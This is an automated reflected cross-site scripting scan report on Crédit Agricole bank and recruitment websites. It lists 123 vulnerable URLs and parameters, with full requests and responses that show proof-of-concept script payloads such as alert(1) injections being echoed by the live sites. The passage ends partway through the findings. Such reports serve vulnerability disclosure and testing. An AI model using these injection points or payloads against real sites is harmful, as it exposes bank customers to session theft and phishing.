XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, creditagricole

Report generated by XSS.CX at Mon Sep 12 10:42:52 GMT-06:00 2011.


1. Cross-site scripting (reflected)

1.1. http://www.credit-agricole.com/en/content/search [SearchText parameter]

1.2. http://www.credit-agricole.com/en/content/search [SearchText parameter]

1.3. http://www.credit-agricole.com/en/content/search [SearchText parameter]

1.4. http://www.creditagricole.info/fnca/ca2_7679/fr/tram-train-a-la-reunion [REST URL parameter 3]

1.5. http://www.creditagricole.info/fnca/ca2_7679/fr/tram-train-a-la-reunion [REST URL parameter 4]

1.6. http://www.mycreditagricole.jobs/ [lang parameter]

1.7. http://www.mycreditagricole.jobs/ [lang parameter]

1.8. http://www.mycreditagricole.jobs/ [name of an arbitrarily supplied request parameter]

1.9. http://www.mycreditagricole.jobs/ [name of an arbitrarily supplied request parameter]

1.10. http://www.mycreditagricole.jobs/ [version parameter]

1.11. http://www.mycreditagricole.jobs/ [version parameter]

1.12. http://www.mycreditagricole.jobs/acti_asset_insurance_bank.php [name of an arbitrarily supplied request parameter]

1.13. http://www.mycreditagricole.jobs/acti_asset_insurance_bank.php [name of an arbitrarily supplied request parameter]

1.14. http://www.mycreditagricole.jobs/acti_finance_invest.php [name of an arbitrarily supplied request parameter]

1.15. http://www.mycreditagricole.jobs/acti_finance_invest.php [name of an arbitrarily supplied request parameter]

1.16. http://www.mycreditagricole.jobs/acti_retailbank_france.php [name of an arbitrarily supplied request parameter]

1.17. http://www.mycreditagricole.jobs/acti_retailbank_france.php [name of an arbitrarily supplied request parameter]

1.18. http://www.mycreditagricole.jobs/acti_retailbank_inter.php [name of an arbitrarily supplied request parameter]

1.19. http://www.mycreditagricole.jobs/acti_retailbank_inter.php [name of an arbitrarily supplied request parameter]

1.20. http://www.mycreditagricole.jobs/acti_special_financial.php [name of an arbitrarily supplied request parameter]

1.21. http://www.mycreditagricole.jobs/acti_special_financial.php [name of an arbitrarily supplied request parameter]

1.22. http://www.mycreditagricole.jobs/acti_special_subsidiaries.php [name of an arbitrarily supplied request parameter]

1.23. http://www.mycreditagricole.jobs/acti_special_subsidiaries.php [name of an arbitrarily supplied request parameter]

1.24. http://www.mycreditagricole.jobs/acti_support.php [name of an arbitrarily supplied request parameter]

1.25. http://www.mycreditagricole.jobs/acti_support.php [name of an arbitrarily supplied request parameter]

1.26. http://www.mycreditagricole.jobs/activities_careers.php [name of an arbitrarily supplied request parameter]

1.27. http://www.mycreditagricole.jobs/activities_careers.php [name of an arbitrarily supplied request parameter]

1.28. http://www.mycreditagricole.jobs/apply.php [name of an arbitrarily supplied request parameter]

1.29. http://www.mycreditagricole.jobs/apply.php [name of an arbitrarily supplied request parameter]

1.30. http://www.mycreditagricole.jobs/cagroup.php [name of an arbitrarily supplied request parameter]

1.31. http://www.mycreditagricole.jobs/cagroup.php [name of an arbitrarily supplied request parameter]

1.32. http://www.mycreditagricole.jobs/cagroup_activities.php [name of an arbitrarily supplied request parameter]

1.33. http://www.mycreditagricole.jobs/cagroup_activities.php [name of an arbitrarily supplied request parameter]

1.34. http://www.mycreditagricole.jobs/cagroup_key_figures.php [name of an arbitrarily supplied request parameter]

1.35. http://www.mycreditagricole.jobs/cagroup_key_figures.php [name of an arbitrarily supplied request parameter]

1.36. http://www.mycreditagricole.jobs/cagroup_locations.php [name of an arbitrarily supplied request parameter]

1.37. http://www.mycreditagricole.jobs/cagroup_locations.php [name of an arbitrarily supplied request parameter]

1.38. http://www.mycreditagricole.jobs/divers_disab_events.php [name of an arbitrarily supplied request parameter]

1.39. http://www.mycreditagricole.jobs/divers_disab_events.php [name of an arbitrarily supplied request parameter]

1.40. http://www.mycreditagricole.jobs/divers_disability.php [name of an arbitrarily supplied request parameter]

1.41. http://www.mycreditagricole.jobs/divers_disability.php [name of an arbitrarily supplied request parameter]

1.42. http://www.mycreditagricole.jobs/divers_microfinance.php [name of an arbitrarily supplied request parameter]

1.43. http://www.mycreditagricole.jobs/divers_microfinance.php [name of an arbitrarily supplied request parameter]

1.44. http://www.mycreditagricole.jobs/diversity.php [name of an arbitrarily supplied request parameter]

1.45. http://www.mycreditagricole.jobs/diversity.php [name of an arbitrarily supplied request parameter]

1.46. http://www.mycreditagricole.jobs/entities.php [name of an arbitrarily supplied request parameter]

1.47. http://www.mycreditagricole.jobs/entities.php [name of an arbitrarily supplied request parameter]

1.48. http://www.mycreditagricole.jobs/etudiants.php [name of an arbitrarily supplied request parameter]

1.49. http://www.mycreditagricole.jobs/etudiants.php [name of an arbitrarily supplied request parameter]

1.50. http://www.mycreditagricole.jobs/exp_forums.php [name of an arbitrarily supplied request parameter]

1.51. http://www.mycreditagricole.jobs/exp_forums.php [name of an arbitrarily supplied request parameter]

1.52. http://www.mycreditagricole.jobs/exp_key_figures.php [name of an arbitrarily supplied request parameter]

1.53. http://www.mycreditagricole.jobs/exp_key_figures.php [name of an arbitrarily supplied request parameter]

1.54. http://www.mycreditagricole.jobs/exp_requirement.php [name of an arbitrarily supplied request parameter]

1.55. http://www.mycreditagricole.jobs/exp_requirement.php [name of an arbitrarily supplied request parameter]

1.56. http://www.mycreditagricole.jobs/exp_requirement_finance.php [name of an arbitrarily supplied request parameter]

1.57. http://www.mycreditagricole.jobs/exp_requirement_finance.php [name of an arbitrarily supplied request parameter]

1.58. http://www.mycreditagricole.jobs/exp_requirement_inspection.php [name of an arbitrarily supplied request parameter]

1.59. http://www.mycreditagricole.jobs/exp_requirement_inspection.php [name of an arbitrarily supplied request parameter]

1.60. http://www.mycreditagricole.jobs/exp_requirement_risk.php [name of an arbitrarily supplied request parameter]

1.61. http://www.mycreditagricole.jobs/exp_requirement_risk.php [name of an arbitrarily supplied request parameter]

1.62. http://www.mycreditagricole.jobs/exp_video_room.php [name of an arbitrarily supplied request parameter]

1.63. http://www.mycreditagricole.jobs/exp_video_room.php [name of an arbitrarily supplied request parameter]

1.64. http://www.mycreditagricole.jobs/experimentes.php [name of an arbitrarily supplied request parameter]

1.65. http://www.mycreditagricole.jobs/experimentes.php [name of an arbitrarily supplied request parameter]

1.66. http://www.mycreditagricole.jobs/faq.php [name of an arbitrarily supplied request parameter]

1.67. http://www.mycreditagricole.jobs/faq.php [name of an arbitrarily supplied request parameter]

1.68. http://www.mycreditagricole.jobs/grad_campus_captains.php [name of an arbitrarily supplied request parameter]

1.69. http://www.mycreditagricole.jobs/grad_campus_captains.php [name of an arbitrarily supplied request parameter]

1.70. http://www.mycreditagricole.jobs/grad_campus_forums.php [name of an arbitrarily supplied request parameter]

1.71. http://www.mycreditagricole.jobs/grad_campus_forums.php [name of an arbitrarily supplied request parameter]

1.72. http://www.mycreditagricole.jobs/grad_campus_partnerships.php [name of an arbitrarily supplied request parameter]

1.73. http://www.mycreditagricole.jobs/grad_campus_partnerships.php [name of an arbitrarily supplied request parameter]

1.74. http://www.mycreditagricole.jobs/grad_key_figures.php [name of an arbitrarily supplied request parameter]

1.75. http://www.mycreditagricole.jobs/grad_key_figures.php [name of an arbitrarily supplied request parameter]

1.76. http://www.mycreditagricole.jobs/grad_video_room.php [name of an arbitrarily supplied request parameter]

1.77. http://www.mycreditagricole.jobs/grad_video_room.php [name of an arbitrarily supplied request parameter]

1.78. http://www.mycreditagricole.jobs/grad_vie.php [name of an arbitrarily supplied request parameter]

1.79. http://www.mycreditagricole.jobs/grad_vie.php [name of an arbitrarily supplied request parameter]

1.80. http://www.mycreditagricole.jobs/hrpolicy.php [name of an arbitrarily supplied request parameter]

1.81. http://www.mycreditagricole.jobs/hrpolicy.php [name of an arbitrarily supplied request parameter]

1.82. http://www.mycreditagricole.jobs/hrpolicy_benefit_resp.php [name of an arbitrarily supplied request parameter]

1.83. http://www.mycreditagricole.jobs/hrpolicy_benefit_resp.php [name of an arbitrarily supplied request parameter]

1.84. http://www.mycreditagricole.jobs/hrpolicy_career.php [name of an arbitrarily supplied request parameter]

1.85. http://www.mycreditagricole.jobs/hrpolicy_career.php [name of an arbitrarily supplied request parameter]

1.86. http://www.mycreditagricole.jobs/hrpolicy_personal.php [name of an arbitrarily supplied request parameter]

1.87. http://www.mycreditagricole.jobs/hrpolicy_personal.php [name of an arbitrarily supplied request parameter]

1.88. http://www.mycreditagricole.jobs/hrpolicy_recruitment.php [name of an arbitrarily supplied request parameter]

1.89. http://www.mycreditagricole.jobs/hrpolicy_recruitment.php [name of an arbitrarily supplied request parameter]

1.90. http://www.mycreditagricole.jobs/hrpolicy_remuneration.php [name of an arbitrarily supplied request parameter]

1.91. http://www.mycreditagricole.jobs/hrpolicy_remuneration.php [name of an arbitrarily supplied request parameter]

1.92. http://www.mycreditagricole.jobs/index.php [name of an arbitrarily supplied request parameter]

1.93. http://www.mycreditagricole.jobs/index.php [name of an arbitrarily supplied request parameter]

1.94. http://www.mycreditagricole.jobs/innovation.php [name of an arbitrarily supplied request parameter]

1.95. http://www.mycreditagricole.jobs/innovation.php [name of an arbitrarily supplied request parameter]

1.96. http://www.mycreditagricole.jobs/jeunes_diplomes.php [name of an arbitrarily supplied request parameter]

1.97. http://www.mycreditagricole.jobs/jeunes_diplomes.php [name of an arbitrarily supplied request parameter]

1.98. http://www.mycreditagricole.jobs/news.php [name of an arbitrarily supplied request parameter]

1.99. http://www.mycreditagricole.jobs/news.php [name of an arbitrarily supplied request parameter]

1.100. http://www.mycreditagricole.jobs/search_result.php [name of an arbitrarily supplied request parameter]

1.101. http://www.mycreditagricole.jobs/search_result.php [name of an arbitrarily supplied request parameter]

1.102. http://www.mycreditagricole.jobs/sitemap.php [name of an arbitrarily supplied request parameter]

1.103. http://www.mycreditagricole.jobs/sitemap.php [name of an arbitrarily supplied request parameter]

1.104. http://www.mycreditagricole.jobs/stud_campus_captains.php [name of an arbitrarily supplied request parameter]

1.105. http://www.mycreditagricole.jobs/stud_campus_captains.php [name of an arbitrarily supplied request parameter]

1.106. http://www.mycreditagricole.jobs/stud_campus_forums.php [name of an arbitrarily supplied request parameter]

1.107. http://www.mycreditagricole.jobs/stud_campus_forums.php [name of an arbitrarily supplied request parameter]

1.108. http://www.mycreditagricole.jobs/stud_campus_partnerships.php [name of an arbitrarily supplied request parameter]

1.109. http://www.mycreditagricole.jobs/stud_campus_partnerships.php [name of an arbitrarily supplied request parameter]

1.110. http://www.mycreditagricole.jobs/stud_internships.php [name of an arbitrarily supplied request parameter]

1.111. http://www.mycreditagricole.jobs/stud_internships.php [name of an arbitrarily supplied request parameter]

1.112. http://www.mycreditagricole.jobs/stud_key_figures.php [name of an arbitrarily supplied request parameter]

1.113. http://www.mycreditagricole.jobs/stud_key_figures.php [name of an arbitrarily supplied request parameter]

1.114. http://www.mycreditagricole.jobs/stud_orsay.php [name of an arbitrarily supplied request parameter]

1.115. http://www.mycreditagricole.jobs/stud_orsay.php [name of an arbitrarily supplied request parameter]

1.116. http://www.mycreditagricole.jobs/stud_part_time.php [name of an arbitrarily supplied request parameter]

1.117. http://www.mycreditagricole.jobs/stud_part_time.php [name of an arbitrarily supplied request parameter]

1.118. http://www.mycreditagricole.jobs/stud_video_room.php [name of an arbitrarily supplied request parameter]

1.119. http://www.mycreditagricole.jobs/stud_video_room.php [name of an arbitrarily supplied request parameter]

1.120. http://www.mycreditagricole.jobs/stud_vie.php [name of an arbitrarily supplied request parameter]

1.121. http://www.mycreditagricole.jobs/stud_vie.php [name of an arbitrarily supplied request parameter]

1.122. http://www.mycreditagricole.jobs/video_room.php [name of an arbitrarily supplied request parameter]

1.123. http://www.mycreditagricole.jobs/video_room.php [name of an arbitrarily supplied request parameter]



1. Cross-site scripting (reflected)
There are 123 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.credit-agricole.com/en/content/search [SearchText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.credit-agricole.com
Path:   /en/content/search

Issue detail

The value of the SearchText request parameter is copied into the HTML document as text between TITLE tags. The payload d9eea</title><x%20style%3dx%3aexpression(alert(1))>4dc10869d8e was submitted in the SearchText parameter. This input was echoed as d9eea</title><x style=x:expression(alert(1))>4dc10869d8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /en/content/search?SearchText=jobs+phone+contactd9eea</title><x%20style%3dx%3aexpression(alert(1))>4dc10869d8e&valider= HTTP/1.1
Host: www.credit-agricole.com
Proxy-Connection: keep-alive
Referer: http://www.credit-agricole.com/en
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eZSESSID82a9e4d26595c87ab6e442391d8c5bba=6ec3a4f29e68e73a4f47cf5f501021ce; xtvrn=$446407$; eZSESSID9cfefed8fb9497baa5cd519d7d2bb5d7=5011bdf023055722038e88cbd6d0f072; xtan=-; xtant=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:02:02 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 11:02:02 GMT
X-Powered-By: eZ Publish
Served-by: www.credit-agricole.com
Content-language: en-GB
Vary: Accept-Encoding,User-Agent
Content-Length: 88029
Content-Type: text/html; charset=utf-8
Via: 1.1 www.credit-agricole.com
X-Cache: MISS from www.credit-agricole.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<hea
...[SNIP]...
<title>Search "jobs phone contactd9eea</title><x style=x:expression(alert(1))>4dc10869d8e" - page 1</title>
...[SNIP]...

1.2. http://www.credit-agricole.com/en/content/search [SearchText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.credit-agricole.com
Path:   /en/content/search

Issue detail

The value of the SearchText request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe48d"%3balert(1)//0165f445b41 was submitted in the SearchText parameter. This input was echoed as fe48d";alert(1)//0165f445b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en/content/search?SearchText=jobs+phone+contactfe48d"%3balert(1)//0165f445b41&valider= HTTP/1.1
Host: www.credit-agricole.com
Proxy-Connection: keep-alive
Referer: http://www.credit-agricole.com/en
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eZSESSID82a9e4d26595c87ab6e442391d8c5bba=6ec3a4f29e68e73a4f47cf5f501021ce; xtvrn=$446407$; eZSESSID9cfefed8fb9497baa5cd519d7d2bb5d7=5011bdf023055722038e88cbd6d0f072; xtan=-; xtant=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:01:46 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 11:01:46 GMT
X-Powered-By: eZ Publish
Served-by: www.credit-agricole.com
Content-language: en-GB
Vary: Accept-Encoding,User-Agent
Content-Length: 87945
Content-Type: text/html; charset=utf-8
Via: 1.1 www.credit-agricole.com
X-Cache: MISS from www.credit-agricole.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<hea
...[SNIP]...
<!--
xt_mtcl = "jobs phone contactfe48d";alert(1)//0165f445b41"; //keyword value
xt_npg = "0"; //result page number (0 when no result)
//do not modify below
if (window.xtparam!=null){window.xtparam+="&mc="+xt_mtcl+"&np="+xt_npg;}
else{window.xtparam ="&mc="+xt_mt
...[SNIP]...

1.3. http://www.credit-agricole.com/en/content/search [SearchText parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.credit-agricole.com
Path:   /en/content/search

Issue detail

The value of the SearchText request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40a49"><x%20style%3dx%3aexpression(alert(1))>9982cd2f612 was submitted in the SearchText parameter. This input was echoed as 40a49"><x style=x:expression(alert(1))>9982cd2f612 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /en/content/search?SearchText=jobs+phone+contact40a49"><x%20style%3dx%3aexpression(alert(1))>9982cd2f612&valider= HTTP/1.1
Host: www.credit-agricole.com
Proxy-Connection: keep-alive
Referer: http://www.credit-agricole.com/en
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eZSESSID82a9e4d26595c87ab6e442391d8c5bba=6ec3a4f29e68e73a4f47cf5f501021ce; xtvrn=$446407$; eZSESSID9cfefed8fb9497baa5cd519d7d2bb5d7=5011bdf023055722038e88cbd6d0f072; xtan=-; xtant=1

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:01:42 GMT
Server: Apache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 12 Sep 2011 11:01:42 GMT
X-Powered-By: eZ Publish
Served-by: www.credit-agricole.com
Content-language: en-GB
Vary: Accept-Encoding,User-Agent
Content-Length: 88010
Content-Type: text/html; charset=utf-8
Via: 1.1 www.credit-agricole.com
X-Cache: MISS from www.credit-agricole.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">
<hea
...[SNIP]...
<input type="text" name="SearchText" value="jobs phone contact40a49"><x style=x:expression(alert(1))>9982cd2f612" class="input_txt" id="search" />
...[SNIP]...

1.4. http://www.creditagricole.info/fnca/ca2_7679/fr/tram-train-a-la-reunion [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditagricole.info
Path:   /fnca/ca2_7679/fr/tram-train-a-la-reunion

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48377"><script>alert(1)</script>8057bf0bb42 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fnca/ca2_7679/fr48377"><script>alert(1)</script>8057bf0bb42/tram-train-a-la-reunion HTTP/1.1
Host: www.creditagricole.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:04:52 GMT
Server: Apache
X-Jcms-Ajax-Id: AjaxCtxt-0-1315825492812
Connection: close
Content-Type: text/html;charset=UTF-8
Pragma:no-cache
Content-Length: 55398


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='fr' xml:lang='fr' dir='ltr' xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<a href="http://www.creditagricole.info/fnca/ca2_7679/fr48377"><script>alert(1)</script>8057bf0bb42/tram-train-a-la-reunion#menu">
...[SNIP]...

1.5. http://www.creditagricole.info/fnca/ca2_7679/fr/tram-train-a-la-reunion [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.creditagricole.info
Path:   /fnca/ca2_7679/fr/tram-train-a-la-reunion

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c6da"><script>alert(1)</script>4db6a1e6fa5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fnca/ca2_7679/fr/tram-train-a-la-reunion2c6da"><script>alert(1)</script>4db6a1e6fa5 HTTP/1.1
Host: www.creditagricole.info
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:05:17 GMT
Server: Apache
X-Jcms-Ajax-Id: AjaxCtxt-0-1315825517296
Connection: close
Content-Type: text/html;charset=UTF-8
Pragma:no-cache
Content-Length: 55399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang='fr' xml:lang='fr' dir='ltr' xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...
<a href="http://www.creditagricole.info/fnca/ca2_7679/fr/tram-train-a-la-reunion2c6da"><script>alert(1)</script>4db6a1e6fa5#menu">
...[SNIP]...

1.6. http://www.mycreditagricole.jobs/ [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84ac5"-alert(1)-"4917365c010 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?lang=uk84ac5"-alert(1)-"4917365c010&version=Texte HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:26 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:26 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Emploi
...[SNIP]...
var SharingBaseTitle = "Emploi banque et Recrutement dans les m..tiers de la finance et de l'assurance - Groupe Cr..dit Agricole";
var SharingUrl = "http://www.recrutement.credit-agricole.com/?lang=uk84ac5"-alert(1)-"4917365c010&version=Texte";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePa
...[SNIP]...

1.7. http://www.mycreditagricole.jobs/ [lang parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58490"><a>96ad14ea3c0 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?lang=uk58490"><a>96ad14ea3c0&version=Texte HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:09 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:09 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 38681

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="fr">
<head>
<title>Emploi
...[SNIP]...
<link rel="target_url" href="http://www.recrutement.credit-agricole.com/?lang=uk58490"><a>96ad14ea3c0&version=Texte" />
...[SNIP]...

1.8. http://www.mycreditagricole.jobs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 639d0"-alert(1)-"bf90bdcc82b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?639d0"-alert(1)-"bf90bdcc82b=1 HTTP/1.1
Host: www.mycreditagricole.jobs
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 11:03:23 GMT
Server: Apache
Expires: 0
Cache-Control: no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: OffresTotalKiosque=500; expires=Mon, 12-Sep-2011 12:03:23 GMT; path=/
Content-Type: text/html
Via: 1.1 www.recrutement.credit-agricole.com
X-Cache: MISS from www.recrutement.credit-agricole.com
Connection: close
Content-Length: 36899

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk">
<head>
<title>Recruit
...[SNIP]...
var SharingBaseTitle = "Recruitment and employment opportunities in banking, finance and insurance professions - Cr..dit Agricole Group";
var SharingUrl = "http://www.recrutement.credit-agricole.com/?639d0"-alert(1)-"bf90bdcc82b=1";
var SharingImage = "http://www.recrutement.credit-agricole.com/img/entites/logos/casa.jpg";
var SharingDomaine = "http://www.recrutement.credit-agricole.com/";
var SharingDomainePage = "http:/
...[SNIP]...

1.9. http://www.mycreditagricole.jobs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mycreditagricole.jobs
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11e10"><a>63ede3a82e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

